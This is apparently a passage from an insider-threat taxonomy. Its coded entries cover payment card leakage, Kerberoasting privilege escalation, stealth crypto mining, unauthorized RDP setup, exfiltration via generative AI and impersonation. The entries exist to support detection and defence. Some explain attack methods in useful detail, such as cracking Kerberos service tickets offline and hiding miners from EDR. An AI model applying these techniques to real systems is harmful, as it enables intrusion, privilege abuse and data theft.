  • Isolate team members or limit their exposure to security training, potentially creating vulnerabilities within the team that could be exploited. By controlling the flow of information or limiting access to security awareness resources, a manager can enable an environment conducive to insider threats.
  • Recruit or hire individuals within their team or external candidates who are susceptible to manipulation or willing to participate in insider activities. A subject in a management role could use their hiring influence to bring in new team members who align with or are manipulated into assisting in the subject's illicit plans, increasing the risk of coordinated insider actions.

 

In addition to these immediate risks, subjects in people management roles may also have the ability to recruit individuals from their team for insider activities, subtly influencing them to support illicit actions or help cover up their activities. By fostering a sense of loyalty or manipulating interpersonal relationships, the subject may encourage compliance with unethical actions, making it more difficult for others to detect or challenge the behavior.

 

Given the central role that managers play in shaping team culture and operational practices, the risks posed by a subject in a management position are compounded by their ability to both directly influence the behavior of others and manipulate processes for personal or malicious gain.

IF022.004Payment Card Data Leakage

A subject with access to payment environments or transactional data may deliberately or inadvertently leak sensitive payment card information. Payment Card Data Leakage refers to the unauthorized exposure, transmission, or exfiltration of data governed by the Payment Card Industry Data Security Standard (PCI DSS). This includes both Cardholder Data (CHD)—such as the Primary Account Number (PAN), cardholder name, expiration date, and service code—and Sensitive Authentication Data (SAD), which encompasses full track data, card verification values (e.g., CVV2, CVC2, CID), and PIN-related information.

 

Subjects with privileged, technical, or unsupervised access to point-of-sale systems, payment gateways, backend databases, or log repositories may mishandle or deliberately exfiltrate CHD or SAD. In some scenarios, insiders may exploit access to system-level data stores, intercept transactional payloads, or scrape logs that improperly store SAD in violation of PCI DSS mandates. This may include exporting payment data in plaintext, capturing full card data from logs, or replicating data to unmonitored environments for later retrieval.

 

Weak controls, such as the absence of data encryption, improper tokenization of PANs, misconfigured retention policies, or lack of field-level access restrictions, can facilitate misuse by insiders. In some cases, access may be shared or escalated informally, bypassing formal entitlement reviews or just-in-time provisioning protocols. These gaps in security can be manipulated by a subject seeking to leak or profit from payment card data.

 

Insiders may also use legitimate business tools—such as reporting platforms or data exports—to intentionally bypass obfuscation mechanisms or deliver raw payment data to unauthorized recipients. Additionally, compromised service accounts or insider-created backdoors can provide long-term persistence for continued exfiltration of sensitive data.

 

Data loss involving CHD or SAD often trigger mandatory breach disclosures, regulatory scrutiny, and severe financial penalties. They also pose reputational risks, particularly when data loss undermines consumer trust or payment processing agreements. In high-volume environments, even small-scale leaks can result in widespread exposure of customer data and fraud.

MT005.002Corporate Espionage

A third party private organization deploys an individual to a target organization to covertly steal confidential or classified information or gain strategic access for its own benefit.

MT005.003Financial Desperation

A subject facing financial difficulties attempts to resolve their situation by exploiting their access to or knowledge of the organization. This may involve selling access or information to a third party or conspiring with others to cause harm to the organization for financial gain.

MT005.001Speculative Corporate Espionage

A subject covertly collects confidential or classified information, or gains access, with the intent to sell it to a third party private organization.

IF012.002Statements On Personal Social Media

A subject uses personal social media accounts to post statements or other media that can result in brand damage through association between the subject and their employer.

IF012.001Statements On Organization's Social Media

A subject uses existing access to social media accounts owned by the organization to post statements or other media that can result in brand damage.

IF015.001Theft of a Corporate Laptop

A subject steals a corporate laptop belonging to an organization.

PR024.001Privilege Escalation through Kerberoasting

Kerberoasting is a technique that can be exploited by a subject to escalate privileges and gain unauthorized access to sensitive systems within a network. From the perspective of a subject—who may be a low-privileged user with legitimate access to the network—the attack takes advantage of weaknesses in the Kerberos authentication protocol used by Active Directory (AD).

 

Kerberos Authentication Process

In a Kerberos-based network (like those using Active Directory), clients—users, computers, or services—authenticate to services using service tickets. When a client wants to access a service (e.g., a file server or email service), it requests a service ticket from the Ticket Granting Service (TGS). This request is made using the Service Principal Name (SPN) of the target service.

The TGS then issues a service ticket containing the hashed credentials (password) of the service account associated with that SPN. These credentials are encrypted in the service ticket, and the client can present the ticket to the service to authenticate.

 

Subject Requesting Service Tickets

A subject, typically a domain user with limited privileges, can exploit this process by requesting service tickets for service accounts running critical or high-privilege services, such as domain controllers or admin-level service accounts. These accounts are often associated with SPNs in Active Directory.

The subject can identify these SPNs—often for high-value targets like SQL Server, Exchange, or other administrative services—by querying the domain or using enumeration tools. Once these SPNs are identified, the subject can request service tickets for these service accounts from the TGS.

 

Cracking the Service Tickets

The key aspect of the Kerberoasting attack is that the service tickets contain hashed credentials of the service account. If these service accounts use weak, easily guessable passwords, the subject can extract the service tickets and attempt to crack the hashes offline using tools like Hashcat or John the Ripper.

Since these passwords are typically not subject to regular user password policies (i.e., they may not be as complex), weak or easily cracked passwords are a prime target for the subject.

 

Privilege Escalation and Unauthorized Access

Once the subject successfully cracks the password of a service account, they can use the credentials to gain elevated privileges. For example:

  • If the cracked service account belongs to a high-privilege service (e.g., Domain Admins or Enterprise Admins), the subject can use these credentials to access systems, services, and parts of the network they would not ordinarily be permitted to access. This could include sensitive files, servers, or even Active Directory itself.
  • The subject can use these credentials to move laterally within the network, expanding their access to additional systems that are typically restricted to high-privilege accounts.
  • With administrative-level access, the subject can make changes to critical systems, alter configurations, or install malicious software. This could lead to further insider events, such as data exfiltration, malware deployment, or even persistent backdoors for ongoing unauthorized access.

 

Reconnaissance and Exploitation

The subject can perform additional reconnaissance within the network to identify other high-privilege accounts and services associated with service accounts. They can continue requesting service tickets for additional SPNs and cracking any other weak passwords they find, gradually escalating their access to more critical systems.

With broad access, the subject may also attempt to manipulate access controls, elevate privileges further, or carry out malicious actions undetected. This provides a potential stepping stone to more serious insider threats and an expanded attack surface for other actors.

IF009.005Anti-Sleep Software

The subject installs or enables software, scripts, or hardware devices designed to prevent systems from automatically locking, logging out, or entering sleep mode. This unauthorized action deliberately subverts security controls intended to protect unattended systems from unauthorized access.

 

Characteristics

  • Circumvents policies enforcing session locks, idle timeouts, and mandatory logout periods.
  • May involve third-party applications ("caffeine" tools), anti-idle scripts, or physical devices such as USB mouse jigglers.
  • Typically deployed without organizational approval or awareness.
  • Leaves systems continuously unlocked and accessible, undermining endpoint security and physical safeguards.
  • Renders full disk encryption protections ineffective while the system remains powered and unlocked.
  • Creates opportunities for unauthorized access, data exfiltration, or device compromise by malicious insiders or third parties.

 

Example Scenario

A subject installs unauthorized anti-sleep software on a corporate laptop to prevent automatic locking during idle periods. As a result, the device remains accessible even when left unattended in unsecured environments such as cafes, airports, or shared workspaces. This action bypasses mandatory screen-lock policies and renders full disk encryption protections ineffective, exposing sensitive organizational data to theft or compromise by malicious third parties who can physically access the unattended device.

IF001.006Exfiltration via Generative AI Platform

The subject transfers sensitive, proprietary, or classified information into an external generative AI platform through text input, file upload, API integration, or embedded application features. This results in uncontrolled data exposure to third-party environments outside organizational governance, potentially violating confidentiality, regulatory, or contractual obligations.

 

Characteristics

  • Involves manual or automated transfer of sensitive data through:
  • Web-based AI interfaces (e.g., ChatGPT, Claude, Gemini).
  • Upload of files (e.g., PDFs, DOCX, CSVs) for summarization, parsing, or analysis.
  • API calls to generative AI services from scripts or third-party SaaS integrations.
  • Embedded AI features inside productivity suites (e.g., Copilot in Microsoft 365, Gemini in Google Workspace).
  • Subjects may act with or without malicious intent—motivated by efficiency, convenience, curiosity, or deliberate exfiltration.
  • Data transmitted may be stored, cached, logged, or used for model retraining, depending on provider-specific terms of service and API configurations.
  • Exfiltration through generative AI channels often evades traditional DLP (Data Loss Prevention) patterns due to novel data formats, variable input methods, and encrypted traffic.

 

Example Scenario

A subject copies sensitive internal financial projections into a public generative AI chatbot to "optimize" executive presentation materials. The AI provider, per its terms of use, retains inputs for service improvement and model fine-tuning. Sensitive data—now stored outside corporate control—becomes vulnerable to exposure through potential data breaches, subpoena, insider misuse at the service provider, or future unintended model outputs.

IF009.006Installing Crypto Mining Software

The subject installs and operates unauthorized cryptocurrency mining software on organizational systems, leveraging compute, network, and energy resources for personal financial gain. This activity subverts authorized system use policies, degrades operational performance, increases attack surface, and introduces external control risks.

 

Characteristics

  • Deploys CPU-intensive or GPU-intensive processes (e.g., xmrig, ethminer, phoenixminer, nicehash) on endpoints, servers, or cloud infrastructure without approval.
  • May use containerized deployments (Docker), low-footprint mining scripts, browser-based JavaScript miners, or stealth binaries disguised as legitimate processes.
  • Often configured to throttle resource usage during business hours to evade human and telemetry detection.
  • Establishes persistent outbound network connections to mining pools (e.g., via Stratum mining protocol over TCP/SSL).
  • Frequently disables system security features (e.g., Anti-Virus (AV)/Endpoint Detection & Response (EDR) agents, power-saving modes) to maintain uninterrupted mining sessions.
  • Represents not only misuse of resources but also creates unauthorized outbound communication channels that bypass standard network controls.

 

Example Scenario

A subject installs a customized xmrig Monero mining binary onto under-monitored R&D servers by side-loading it via a USB device. The miner operates in "stealth mode," hiding its process name within legitimate system services and throttling CPU usage to 60% during business hours. Off-peak hours show 95% CPU utilization with persistent outbound TCP traffic to an external mining pool over a non-standard port. The mining operation remains active for six months, leading to significant compute degradation, unplanned electricity costs, and unmonitored external network connections that could facilitate broader compromise.

PR026.001Remote Desktop (RDP) Access on Windows Systems

The subject initiates configuration changes to enable Remote Desktop Protocol (RDP) or Remote Assistance on a Windows system, typically through the System Properties dialog, registry modifications, or local group policy. This behavior may indicate preparatory actions to grant unauthorized remote access to the endpoint, whether to an external actor, co-conspirator, or secondary account.

 

Characteristics

Subject opens the Remote tab within the System Properties dialog (SystemPropertiesRemote.exe) and enables:

  • Remote Assistance
    Remote Desktop

 

May configure additional RDP-related settings such as:

  • Allowing connections from any version of RDP clients (less secure)
    Adding specific users to the Remote Desktop Users group
    Modifying Group Policy to allow RDP access

 

Often accompanied by:

  • Firewall rule changes to allow inbound RDP (TCP 3389)
    Creation of local accounts or service accounts with RDP permissions
    Disabling sleep, lock, or idle timeout settings to keep the system continuously accessible

 

In some cases, used to stage access prior to file exfiltration, remote control handoff, or backdoor persistence.

 

Example Scenario

A subject accesses the Remote tab via SystemPropertiesRemote.exe and enables Remote Desktop, selecting the “Allow connections from computers running any version of Remote Desktop” option. They add a personal email-based Microsoft account to the Remote Desktop Users group. No help desk ticket or change request is submitted. Over the following days, successful RDP logins are observed from an IP address outside of corporate VPN boundaries, correlating with a data transfer spike.

PR026.002Remote Desktop Web Access

The subject initiates or configures access to a system using Remote Desktop or Remote Assistance via a web browser interface, often through third-party tools or services (e.g., LogMeIn, AnyDesk, Chrome Remote Desktop, Microsoft RD Web Access). This behavior may indicate preparatory actions to facilitate unauthorized remote access, either for a co-conspirator, a secondary device, or future remote exfiltration. Unlike traditional RDP clients, browser-based remote access methods may bypass endpoint controls and often operate over HTTPS, making detection more difficult with traditional monitoring.

 

This method may be used when traditional RDP clients are blocked or monitored, or when the subject intends to evade installed software policies and gain access through externally hosted portals. While some web-based tools require agents to be installed on the target machine, others permit remote viewing or interaction without full installation, particularly when configured in advance.

PR027.002Impersonation via Collaboration and Communication Tools

The subject creates, modifies, or misuses digital identities within internal communication or collaboration environments—such as email, chat platforms (e.g., Slack, Microsoft Teams), or shared document spaces—to impersonate trusted individuals or roles. This tactic is used to gain access, issue instructions, extract sensitive data, or manipulate workflows under the guise of legitimacy.

 

Impersonation in this context can be achieved through:

  • Lookalike email addresses (e.g., spoofed domains or typo squatting).
  • Cloned display names in collaboration tools.
  • Shared calendar invites or chats initiated under false authority.
  • Use of compromised or unused accounts from real employees, contractors, or vendors.

 

The impersonation may be part of early-stage insider coordination, privilege escalation attempts, or subtle reconnaissance designed to map workflows, bypass controls, or test detection thresholds.

 

Example Scenarios:

  • A subject registers a secondary internal email alias (john.smyth@corp-secure.com) closely resembling a senior executive and uses it to request financial data from junior employees.
  • A subject joins a sensitive Slack channel using a display name that mimics another department member and quietly monitors ongoing discussions related to mergers and acquisitions activity.
  • A compromised service account is used by an insider to initiate SharePoint document shares with external parties, appearing as a legitimate internal action.
  • The subject impersonates an IT support contact via Teams or email to socially engineer MFA tokens or password resets.